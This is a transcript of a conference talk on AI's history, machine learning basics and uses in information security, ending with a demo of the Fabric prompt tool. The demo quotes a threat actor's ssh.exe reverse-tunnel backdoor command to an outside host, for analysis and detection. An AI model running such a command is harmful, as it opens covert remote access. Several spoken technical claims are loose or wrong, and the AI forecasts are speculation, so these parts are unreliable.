let's go into two guys and an AI walk into a bar. So originally I was going to play the AI and I was going to be really like, semi-clueless, right? And dependent on the humans. But we wrote slides that are way more serious than that. So, okay, we're going to state a little bit of the obvious. Why do we think artificial intelligence is important to information security? Do these points on the screen ring true for you? I would think so, right? We have this awful deficit in our industry. We have an enormous demand to get through the daily tasks that are required to do our jobs, and we have a skills and training deficit. We absolutely have a human resource deficit. And so along comes AI, large language model technology, and then we started scratching our heads and going, how do we use this, right? Like everybody. And I think it's really interesting because the initial attempts at using some of these chat agents, I think all of us in this room probably thought, this is just a Google search on steroids. So if I go to this thing and I say, hello, Mr. AI, or Mrs. AI, or whatever we want to call the AI, I don't know, do they have a gender?
It's Alexa.
It's
or Siri. I can't.
Siri. And we type in some single sentence question. Since then, which was not that long ago, I think most of us in this room have learned that large language models trained on a huge amount of data are much more able than we prior thought. We can even pass them entire paragraphs of text, and they can do stuff with them. All right, but what I think you need to know is, where did this stuff come from? Did it just come from nowhere? All right, so let's kind of go through a little bit of a history and talk about key challenges and opportunities. First of all, I think we're still in the hype cycle, right? We're in this AI, natural language processing. We've got googly eyes, or go ugly eyes. How do you say that? Anyway, for LLMs, and we're using these things like crazy, and we don't really know what we're doing. But here are some key opportunities that we believe that artificial intelligence can be applied to in our industry. Certainly, we could do time series analysis, a very important task for us. Text classification, that's a no-brainer, right? Anomaly detection. And then I think probably the most common use case that everybody's using today is that security analyst sixth sense. Like, my brain is only this big. How do I, get extra context around some defensive action that I am trying to understand, or offensive tactics that I'm trying to understand, right? And then there's this whole other side of it. And that is, we learned very quickly that we can attack artificial intelligence technology, and we can make it do really strange and unusual and sometimes very inappropriate things. So why don't we go to the fundamentals? What exactly is this stuff? It is the science and engineering of making intelligent machines. The term was actually coined by a Stanford professor many years ago. So this gives you a little bit of history. We are tracking back to 1955. Okay, not even this bald guy was alive back then. All right. Okay, I've got a little.
Were you born in 1956?
Yeah, I was born in. No. All right. We have some terminology here. Autonomous systems can independently plan and execute a sequence of steps. Sure, we would like that. What is machine learning? Well, machine learning is a part of artificial intelligence technology, a study of how computers improve perception, knowledge, and thinking by leveraging vast amounts of data. Deep learning, the use of large multi-layer neural networks organized in a human brain configuration. I guess what I'm trying to say is that web interface or that JSON RESTful API that you're tooling around with to talk to these very large compute clusters stands on the shoulders of decades of technological development. In fact, the field grew out of neural network research circa around 1959, and there was a real problem to solve then, and it involved telephony. And the problem was simply phone echo, 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 right? So these people at Stanford, Bernard Widrow and Marcian Hoff, developed one of the very early neural networks, Adeline and Madeline, whose sole job was to predict the next bit value of a sequence of bits. And the goal being, I want to cancel out the phone echo, echo, echo. Next slide. Now, a strange thing was going on back then. We had the von Neumann architecture of computing that was catching fire and was very popular. It was dominating the compute field. The challenge we had when we tried to overlay neural network technology is that the von Neumann architecture is primarily a serial compute architecture, whereby we fetch something from memory, we do something with it, and we put the result back in memory. Neural networks are essentially very large mathematical linear algebra computation machines. We need to process huge vectors of data in parallel. The von Neumann architecture did not suit the task. It was too slow. Another thing that occurs to me as I think about where we are is the law of the number of transistors on a microchip, otherwise known as Moore's law, basically stated that we are going through essentially a increasing linear transistor count. Actually, it wasn't even linear, it's more exponential transistor count increase over time. And the question that occurred to me as we look at artificial intelligence technology is, have we broken this, what a lot of people think of as an immutable law of compute power? My assertion is that artificial intelligence technology and parallel computation engines, as developed by companies like NVIDIA, have not broken Moore's law. They have stayed within that paradigm. It's just a bit of a shift in the way we're thinking. The other thing we wanted to do for you is give you a little bit of historical context on the timeline. So around about 1966, we had a model called ELIZA that was developed at MIT. In 72, we had statistically trained natural language processing that emerged. Probably the seminal turning point in the research as it applies to neural networks and large language models specifically was the paper published in 1997 by Hochreiter and Schmidhuber, which introduced to us a neural network algorithm layer called the long-term short-term model, LSTM. LSTM, if you're in the business of building your own artificial neural network model, is one of the key layers in the technology stack that you will be employing. The other specifically notable change was NVIDIA's introduction of the GPU in 1999. So right after the late 90s, all of a sudden, the research community around neural networks got very excitable and decided it was time to bring this back into existence. A long period of time went by because we were still hamstrung by the lack of processing power that we truly needed. However, we had multiple new AI models released between 2000 and 2016, largely by the larger technology players, IBM, Facebook, Meta, Google, and then finally the funding of OpenAI in 2015.
So, Joff, would you say that we had a lot of the math for what we use now in the late 90s and early 2000s? We just didn't have the computing power.
I think that is a correct statement. We had the algorithms. We had the mathematical theory. We had the statistical foundations. We just didn't have the compute cycles yet. In 2017, Google introduced the transformer models, and very quickly thereafter, they made the TensorFlow processor available, which was a leap forward in hardware technology. And tensor processing units, TPUs, are still available for use today, and they are very powerful linear algebra processors that we can use neural networks on to accelerate our tasks. That same year, OpenAI publishes a paper on GPT, and Google introduces a competitive model, BERT, which was a natural language processing model trained by Google, of course. Now, right after that, guess what happened? The world went to, you know what, because a pandemic came along. However, things kept moving forward. In 2019, OpenAI actually released GPT-2. This is in red text because this was a critical turning point in the history of the development and use of large language models based on neural networks. Between 2022 and 2024, I can only picture it like this. By the way, that picture was drawn by the DALL-E 3 AI model. It was a period of time where we just saw an explosive growth in the technology. We had unleashed the genie out of the bottle. There's another publication here by Mueller et al. Of a AI LLM evolutionary tree that I find quite interesting. And you see the similar trend there, that nascent stage of LLMs in 2018, followed by this explosive branch, especially on the Google side of the tree here, of all of these different models, Claude 2, Jurassic 2, all those things going on, right? Now, what did this mean for us? And actually, more to the point, how did we measure the quality, the accuracy of the generational text that was coming out of these large language models? So there were several efforts to test these models against different human domains of reasoning. And you can see that right around 2018 to 2020, these models started performing at or above the human baseline of knowledge, where the human baseline is that 0 line. In fact, so much so that I don't remember who came up with this idea, but somebody decided to test them against standardized tests in the United States, such as the Uniform Bar Exam, LSAT, SAT, GRE, all those things. And GPT 3.5, which was the evolution of GPT-2 in 2022, didn't do very well. But by the time GPT-4 was released, we see the AI models doing better on these tests than most humans. So I would say towards the end of 23, we were in a position of having a pretty bright high schooler as a sort of baseline of the performance of these models, right? So now we're in a place, well, I would ask you this first. Are pretty bright high schoolers rational and predictable.
Sometimes you have to give them very specific instructions to get the output that you desire.
Sometimes they dream and hallucinate.
Sometimes they hallucinate. Sometimes they give you the product that you asked for and you say, what the hell is this? But that is what I asked for, sort of, yes.
There's another thing at play here. The compute engine requirements to train these models has been a pretty quick linear acceleration upwards. And that translates into a bit of an arms race of all of these vendors building the next fastest, most powerful compute clusters they can possibly build in terms of the orders of magnitude compute capacity to actually continue on this path. You have to stop and think a minute. The current frontier models in AI, at least that are public, are trained on data sourced from the internet. How much of the data sourced from the internet is complete garbage?
So, yeah,
I would say 99%.
Yeah, 99%. I was going to say, just the next time you ask ChatGPT a question, know that 4chan is in there somewhere.
So what if, and it's not even a what if, because you've got to know that this is happening already. What if we train them on domains of knowledge that is highly, I'm looking for the word, it is highly
specialized.
Yes, specialized. Niche. That is, like, in a life sense, highly selected to be good quality, diverse data. Now we have a smart high schooler that's been reading some really good books, right? We're in a different place. Those models, I'm sure, exist. They're just not public models. Now let's put on our thinking hats for a minute and imagine these orders of magnitude of capability that we are using in order to pursue the excellence of growing bigger and better. And if you break it down into compute, algorithmic efficiency, and this idea of unhobbling, we're going to make some crystal ball predictions. And I didn't make these, by the way. They came from Leopold, I cannot remember his last name, who wrote this paper at situationalawareness.ai. I highly recommend you go take a look at it. Okay. In compute, we think, according to Leo, that there'll be about 2 to 3 orders of magnitude improvement in processing power and system scaling over the next 4 years or so. In algorithmic efficiency, we can make a guess that there's going to be continuous improvement in algorithm design, probably with a 1 to 2 order of magnitude improvement over these next 4 or 5 years. Unhobbling is very hard to quantify. Unhobbling gets into areas such as using an AI to train another AI, taking the output from an AI and feeding it back into the training process for reinforcement learning. So unhobbling is purely experimental, and it continues.
Yeah, I would go so far as to say that you could look at unhobbling as what made large language models effective, and that was bolting on reinforcement learning on top of the large language model neural network.
Okay, so having said that, we're in this kind of projection cycle, according to Leo, and I more or less subscribe to this. I think it's fairly accurate. 2 to 3 order of magnitudes in compute, 1 to 3 order of magnitudes in algorithmic efficiency, and then questionable numbers of magnitude in terms of unhobbling. But we are at this inflection point where we will take our smart high schooler and we're quickly accelerating them towards something that can produce output that is more rational and intelligent than everybody in this room. Potentially. So, another way of saying that, predicted intelligence is going to transition over time from our very smart high schooler, potentially to a knowledge-driven PhD level researcher. As I did all the research in this, I started to become quite depressed. Where are the guardrails? What are we doing socially and ethically in thinking about what we're deploying here? Skynet is being born, right? But not just one of them, hundreds of them.
Yeah, so drop-in knowledge workers are coming very soon. Has anyone ever heard of dropzone.ai? Yeah, they're a new company. I don't know if it works or not, but I read recently that it's basically a large language model-based SOC worker. So basically, it'll work tickets, it'll look at your alerts, it'll replace one of your SOC workers is kind of the idea. But for those that are thinking that we're going to be replaced by AI, insert my AI overlords joke here, right? I think you should look at it a little bit differently. I think you should look at it as AI is going to enhance you and your job if you learn how to use it, if you learn about AI, and that's what we're all here to do, right? Learn about AI.
So, looking at the orders of magnitude with this projection, and again, this is best guesses, right? The scarier point to me is the point in time where we start automating the AI model research itself. That is the ultimate feedback loop where the AI researcher is building its own new models and the humans have zero control. So you can anticipate 100 million automated researchers, each working at 100 times human speed after we automate AI research. This is not fact, this is projection, but this is certainly feasible if you have rolled up your sleeves and have learned to understand this technology, which, by the way, the two of us have. It's strikingly plausible that we go from generalized intelligence to a super intelligence very, very quickly. In fact, this is a little graph, again, from situational awareness that kind of shows the upcoming exponential inflection curve that we're about to hit. Right? Today, we're probably a little bit beyond just the smart high schooler. I think we might be into a college-level student today. Now, this slide I picked up off of Twitter, as much of a dumpster fire that Twitter is. Roger Gross is a computer scientist at the University of Toronto and a founding member of the Vector Institute to Advance Canadian Artificial Intelligence Research. And this is Roger's, there's a Canadian in the audience apparently. You can say that again. There we go. Here he is. Thanks, Dale. Roger claims that this is his depiction of the trajectory towards general intelligence over the next decade. And he claims that the later parts of the path presented are actually the biggest alignment risks and challenges. So in his curve that he published, he puts a little star there, which was about a year ago now, but it says, "We are here, and we're starting to do chain of thought and reinforcement learning into these current models. But eventually, these AI models will have a longer range coherence, making them really useful for generating proposals." And somebody today actually told me there's AIs out there, which you guys probably know already, that are able to generate full podcasts. In fact, for this talk, we even thought about completely generating the talk with an AI model and just sitting down in a chair and watching it. We seriously entertained that idea, okay? The problem is when we go over that threshold and we have not done enough to think about where the humans fit into this equation. We have significant alignment challenges. The OpenAI folks and others had entire departments of people trying to work on the ethical, social, human, HR, etc. concerns, and they couldn't do it. So I do think we're in a bit of a scary place. Now, there's one thing that gives me a tiny bit of comfort. Electricity. These giant compute clusters are very hungry. In fact, the stat that I read recently, earlier this year, said that the GPT-4 model at that time was consuming the equivalent electricity of 30,000 US households every single day just to make the predictions or generate the textual output from all of our queries to it. That's not even the amount of electricity being used to train the model, which is vastly greater. You may have noticed in the media, as biased as it is, that there is a massive interest in renewing the push towards nuclear energy, in fact, any form of energy that will give us enough to supply these large compute clusters. Very recently, there's been a proposal to light up 3 Mile Island's reactor again, to put a data center next to it. Bill Gates has had for some time the TerraPower initiative, where he is building he's building a thorium salt fission-based reactor in Wyoming. There's a reason these people are interested in electricity. We don't have enough. It is the ceiling and it is the cap on this technology right now. It turns out there are other countries that can generate more electricity than we can. It also turns out that the artificial intelligence and neural network research community openly publishes a lot of their research and development efforts. I think that's a huge mistake. Because I think our nearest competitor, with their ability to generate four times more electricity than us, will eventually get a hold of the chips that they need to get ahead of us. Arms race that we're actually living in, and we just don't realize it yet.
So
okay, now that I've scared the crap out of you, it's time for Derek to talk.
So is everybody scared now? I just want to go be a landscaper or something, right? So I have a little bit more of an optimistic view, I think, because just like other technologies, I think that AI is a technology that we can use to make ourselves better analysts, better researchers. And one of the things that I've noticed in talking to folks in the information security community is a lot of times they talk about AI and they're really only talking about large language models. And really, there's so much more to machine learning and AI than large language models. I'd say 95% of business problems aren't solved by large language models. They're solved by other AI or machine learning type technologies. And so on the screen is kind of a survey of kind of how I look at artificial intelligence. You know, AI is kind of a conglomeration of systems that are built on top of machine learning and neural networks and technology that's been around, at least the math, statistical learning methods like k-means clustering and linear regression, logistic regression. If you ever heard of these terms, it's been around for a really long time, decades. And so really, when I look at this graph, it's not about AI and machine learning to me. It's more about the entire field of data science. And so I went and got a master's in data science a couple of years ago, and I've had people often ask me, why did you get a master's in data science when you're in the information security field? What is the overlap there? And there is a lot of overlap with the data science field and cybersecurity. So I'm sure who here has a product that claims it uses AI and machine learning? If you use Microsoft products, if you use M365, you're using AI and machine learning on the back end, even if you don't know it. And so things like enhanced detection, using mathematical methods for detection like risk-based alerting, increasing our understanding of how attacks work, using things for analysts' sixth sense, understanding policies, the correct application of AI technology. To do it correctly, we have to understand. And so how does that help? Why would hackers be interested in data science? To me, AI, machine learning, data science, and hacking all goes together because at the end of the day, well, we want to figure out how it works. And so one of the things that Joff and I have been trying to do recently is kind of inform our colleagues of how AI and machine learning works. And so a lot of people get wrapped up that it's math heavy. It is. As Joff said earlier, we're taking and doing a whole lot of complicated linear algebra on expensive GPU clusters, but taking a step back and looking, and when you think of machine learning, I want you to think of it this way. Don't get wrapped around the axle on the math. Look at the machine learning as algorithm as a black box, and what I'm going to do is I'm going to put data and predictions into that black box, and then there's going to be some math that runs in the black box, and the output is going to be the best fit parameters, or in otherwise my desired output. And so probably the most classic use case. Has anyone ever heard the term linear regression? And so, right, so on the previous slide, I have y equals mx plus b, which I promise is probably going to be the most complicated math I'm going to talk about. We're really talking about the slope of a line. So if you remember back to high school algebra, where you had 2 points and you had an equation and you found the slope of the line, that's essentially what linear regression is doing. It's just a little bit more complicated, finding relationships between variables. So when someone says machine learning, I want you to think, oh, wow, it's really just finding the slope of a line. It's just doing it at a much larger scale. And so this is kind of 2D, 2 dimensions is kind of easy for a human to kind of visualize, right? And so, but when we're talking about these machine learning algorithms at scale, so even with this graph, we could extend it 3D, right? And we could kind of see like the plane that goes back over through the data. But once it gets to 4D, humans start to go, wait a second, I can't really visualize it. 5D, 6D, we're talking about models that have billions of dimensions or parameters. And so what does that kind of look like? We had Dolly give us this data going through a GPU. So it's basically massive parallel data going through the GPUs to essentially give us our most optimal output. And so you might be thinking, like, how does that have to do with large language models? Well, we're getting there. So kind of classic machine learning, kind of like, the math that we were talking about that was introduced or that has been around for a long time, since the late 90s, early 2000s. Kind of have 2 really general categories. You have supervised learning and you have unsupervised learning. And so when you hear about something being trained, typically we're talking about a supervised machine learning model. And they're good for classification, telling one thing from another, or telling how something is different, or how variables are related to each other. And then you have unsupervised learning, which in the field of cybersecurity is really popular, because how many people do anomaly detection? Well, that's really what unsupervised learning is about. Clustering our data together and finding, just like in Sesame Street, one thing's not like the other. And so that's really kind of like what unsupervised machine learning will do. And so supervised machine learning, I'm going to take a labeled data set. Now, when I say labeled data set, so how many people here have spam filters on their email? All of us, right? And so kind of a classic machine learning case is ham versus spam, or phishing versus not phishing. And so we could get a data set of email messages that are labeled phishing versus non-phishing. Either we can get the data set or we could do it ourselves. We can train a machine learning algorithm to recognize the difference between a phishing and a not phishing email. And basically the way that works is that we're going to take all the words that are in the email, we're going to convert it to a vector in linear algebra, and we're going to use that vector to compare against other vectors. And so malware detection, phishing, this is kind of what supervised machine learning applies to in the information security realm. And as I mentioned before, anomaly detection, unsupervised machine learning, it differs in that we're not giving it a labeled data set. It's going to learn on unlabeled data. So we're going to give it data, we're going to give it the parameters we want it to learn on, and then it's going to tell us when something isn't like the rest of the stuff. So a good example of this is credit card fraud detection or finding anomalous network traffic. And so there's kind of like the base case or base cases of what machine learning is. And then enter neural networks. And so neural networks are kind of, we're getting towards where we are with machine or with large language models. So what a neural network is I want you to look at this as the input layer is we're going to shove a bunch of data into it, and these hidden layers are going to be individual like linear regressions or other algorithms that are in there. And when we train this kind of model, we're really changing the weights between the different nodes that are in the neural network. And so when you hear a neural network or a deep neural network, really a deep neural network is typically just going to be 3 layers or less.
Just want to make one comment on that. Remember back a few slides before I started scaring you, I talked about the LSTM layer or the LSTM paper. That LSTM algorithm now is essentially implemented to be part of that hidden layer in the middle of a neural network.
So that stands for long-term, short-term memory. And that basically describes how the neural network is changing weights and learning to find the optimal solution within all of these different nodes. And so really, this is modeled on the human brain. So if you think about how the human brain works, we have a bunch of neurons and the weights change in between our neurons through a chemical process. We're emulating that in a neural network with math. And so that's where we get to kind of like large language models. So we, like Joff described in the history of all of this, that we started taking neural networks and unhobbling them by essentially putting a reinforcement learning type of self-supervised learning on top of neural networks. And we were able to figure out a novel application of essentially getting well, ChatGPT was like a smart toddler, and then ChatGPT-4, by the time it came out, is now what we're calling a smart high schooler. And so it became a whole lot more useful of a tool. And so enter in prompt engineering. So this is a term that you've probably heard, and I will admit that even after I had learned about machine learning and artificial intelligence, when I heard the term prompt engineering, the middle-aged curmudgeon in me decided that that was just a bunch of whatever. But the more I looked into it, the more I realized that, again, just like the smart high schooler analogy, the better the prompt that you put in, or the better the data that you put in to query a large language model is, the better the output that you're going to get.
I would love to make another point on that too. You have prompted, all of you, I know, an AI large language model like ChatGPT or whatever. Have you ever received a response where the AI model says, I don't know?
No, it always knows something, just like a high schooler.
So I want to give you a take-home exercise. This is really fun. Ask ChatGPT or whatever your favorite model of choice is to write a biographical paragraph about you and watch how much absolute BS comes out of it.
I mean, but I get that for my teenager too.
Oh, the teenager analogy.
Hey, one of the things that I hear from my colleagues about AI and large language models is that, oh my gosh, it can hallucinate and give me the wrong answer. It might be wrong. And that is totally 100% true. But so can your coworker. right? So can anybody else. So I don't know how it's really different. I think that if, your coworker gave you an output and you looked at it and you're like, well, hey, that's wrong. I mean, okay, well, you would correct it. I mean, I guess what I'm saying is that just because it could be wrong does not necessarily mean that we should not use it, right? And so a couple of terminology, a couple of terms for large language models. The first thing you might have heard of is a token. Now, we're so awesome in IT. We always use the same word to describe different things. In terms of LLMs, a token is essentially a word, a unit of text that it uses to process data. It could be a word stem, it could be a character, but typically we're talking about words. And then the next thing is a context window. That means basically how much data can I give the large language model and get back, right? And that's the whole, and measured in tokens, right? And so right now, I think that, and if anyone knows differently, please let me know. I think right now, Anthropic and OpenAI, their largest models paid for models are about 128,000 tokens, 128K tokens, which is a lot of words. And I've heard that they're looking to be up to 1 million by the end of the year. And so when we're talking about those drop-in knowledge workers earlier, that's where what we mean is an agent or an autonomous system that's going to use these tokens in a context window to put data into and get out of a large language model. And if you think about 1 million words, that is a lot of text. That is a lot of data. And another kind of nuanced thing that I notice about training a large language model, I hear folks say, well, they're going to use my data to train. Well, they might in the future, but if the large language model is running, it has already been trained. And this context window is kind of your way of getting it up to date to where you are from the data that it has not been trained on. So enter in Fabric, written by Daniel Meisler. Now, this is a command line utility that we can use to improve upon prompts and to get essentially a pre-curated list of prompts that we can use to get better answers out of large language models. In fact, the whole mission of this awesome project from Daniel Meisler is to get us all going down the road of enhancing our day-to-day work through large language model interaction. And so now, would y'all like to see a demo?
Yeah, let's see a demo. All right, so Derek is going to set up a live demo of Daniel's Fabric product. Now, you know how demos go. Anything could happen, right? By the way, this particular picture, DALL-E 3 helped us again. We just asked DALL-E 3 to draw us a picture of MC Hammer as a data scientist, and it looked pretty good, I thought.
And giving a demo.
Yeah. And he's like, it's demo time. All right, it's demo time.
Actually, what I'm most impressed with is it's spelling it's demo time in the back. That is actually pretty cool.
And look at all the test tubes and like graphs and stuff. I mean, it was awesome. I mean, all right. So here we go. We're gonna demo a little bit of Fabric. And while Derek's setting up for that, I'm gonna do a bit of a shameless prompt. Derek and I are following this trail closely and have already written a 4.5-hour short course on AI in information security. I think we called it AI for Cybersecurity Professionals. Or this was the intro to AI for Cybersecurity Professionals.
Can everybody read that? Is it okay? Okay, yep. Cool. So when I say a curated list of prompts, this is all, so basically all the prompts are in Markdown. And so there's a whole bunch: analyze malware, extract wisdom, create command. And so we created our own. Now, so I could probably give a demo for about 45 minutes or so on Fabric, but it's going to be kind of abbreviated here. And so what we did to make an example that is like worth something to InfoSec folks. Have you ever seen a command, like a command line with a bunch of switches, and you thought, what the heck does that even do? What is the context of it? I can go look at the man pages. I can start doing some Googling, right? But sometimes commands, especially from threat actors, can get like, what in the world is that doing? So we found a command probably 2 years ago at this point, and I pick on it a lot in my demos and my content. using Secure Shell as a backdoor, secureshell.exe. How many people know that secureshell.exe is part of Windows? It has been since 2019. That terrifies me more than large language models, to be honest. But Joff says I have 2 minutes. Okay.
Less words, more demoing.
Less words, more demoing. So
while he's demoing, we're about to turn this course into a 2-day experiment. And watch for it on Anti-Siphon's website.
Here's the command, ssh.exe user ssh tunnel at remote.digitalpirateradio.com. We got -f-n-r5000-p -o strict host key check and no. How many people off the top of their head know what that command does? Yeah, exactly. Like, I'm not really sure what F does. It runs it in the background. So we created a custom prompt to pipe into Fabric.
Okay, let me explain this part. What Derek's about to do is stream that text into Fabric and pass it through a prompt called analyze command, and Fabric in the background is using a JSON RESTful API to speak to one of the large language models. I think the default might be ChatGPT-4, and give us an answer to the question we're asking.
ChatGPT-4o, right? And so I know it's kind of hard to read the text a little bit, and it's going a little bit slow, but it gives me a summary explanation, breakdown of options and arguments, and it keeps on going. So here's breakdown of commands and arguments. ssh.exe-f tells sh to go into the background after authentication. And just because this is taking forever.
All right, we're going to cancel that. I want Derek to show you the actual prompt. And this is the interesting part, especially some of the key sentences that we use in prompting the AI. The one that's my favorite is, take a deep breath and think step by step about how to best accomplish this goal using the following context. Does that sound like you're talking to your teenage child or what?
Pretty sure I've uttered those exact words. Take a deep breath. Statistics isn't that hard. So that's all the time they got. So there was a punchline to it. So I was going to modify this on the fly and have it give me a Sigma rule for detecting that SSH backdoor. And it actually is really good, at least to give you a starting prompt for content. Now, I'm not advocating you take the output of ChatGPT and consider it gospel. I'm saying use it as a starting point in your investigations and treat it just like you would a colleague. Okay, do I believe what you're saying? Yeah, it sounds great. So anyway, thanks for letting us fill in the time.
So thanks, everybody. The last slide, Derek, throw it up there on the screen. Artificial Intelligence for Cybersecurity Professionals is the course we're about to put on the street. Keep an eye on it for Anti-Siphon. It will end up being a 16-hour course, not an 8-hour course, and we'll keep you updated. We're going to take you through the weeds of actually building these models yourself, okay? All right, thanks, everybody. Appreciate it.